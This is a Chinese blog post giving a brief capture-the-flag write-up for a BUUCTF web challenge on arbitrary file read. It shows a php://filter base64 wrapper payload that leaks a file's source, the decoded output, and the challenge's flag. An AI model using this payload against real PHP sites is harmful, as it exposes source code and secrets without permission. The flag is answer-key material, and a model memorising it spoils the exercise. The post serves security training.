[第一章 web入门]afr_1 – buu刷题笔记

09511

解题过程:

php伪协议读取flag

?p=php://filter/read=convert.base64-encode/resource=flag

得到

PD9waHAKZGIlKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9

进行base64解码

<?php
db%(\'no no no\');
//n1book{afr_1_solved}

所以flag为n1book{afr_1_solved

------本文已结束,感谢您的阅读------
THE END
技术教程
# 白帽黑客# buu# [第一章 web入门]# 任意文件读取漏洞# afr_1
喜欢就支持一下吧
点赞11 分享
C语言教程的头像,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
2年前 1319
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license,网络安全爱好者中心-神域博客网
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
2年前 961
Goby 2.0.5 Beta红队版 包含1288POC,网络安全爱好者中心-神域博客网
Goby 2.0.5 Beta红队版 包含1288POC
Goby 2.0.5 Beta红队版 包含1288POC
2年前 779
docker pull拉取超时的解决方案_docker,网络安全爱好者中心-神域博客网
docker pull拉取超时的解决方案_docker
docker pull拉取超时的解决方案_docker
2年前 721
【防骗科普】菠菜网站是如何一步一步让你深陷泥潭,直到倾家荡产,网络安全爱好者中心-神域博客网
【防骗科普】菠菜网站是如何一步一步让你深陷泥潭,直到倾家荡产
【防骗科普】菠菜网站是如何一步一步让你深陷泥潭,直到倾家荡产
2年前 518
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
2年前 507
相关推荐
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
2年前 1319
docker pull拉取超时的解决方案_docker,网络安全爱好者中心-神域博客网
docker pull拉取超时的解决方案_docker
docker pull拉取超时的解决方案_docker
2年前 721
【防骗科普】菠菜网站是如何一步一步让你深陷泥潭,直到倾家荡产,网络安全爱好者中心-神域博客网
【防骗科普】菠菜网站是如何一步一步让你深陷泥潭,直到倾家荡产
【防骗科普】菠菜网站是如何一步一步让你深陷泥潭,直到倾家荡产
2年前 518
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
2年前 507
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
2年前 501
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
2年前 447
评论 抢沙发

请登录后发表评论

    暂无评论内容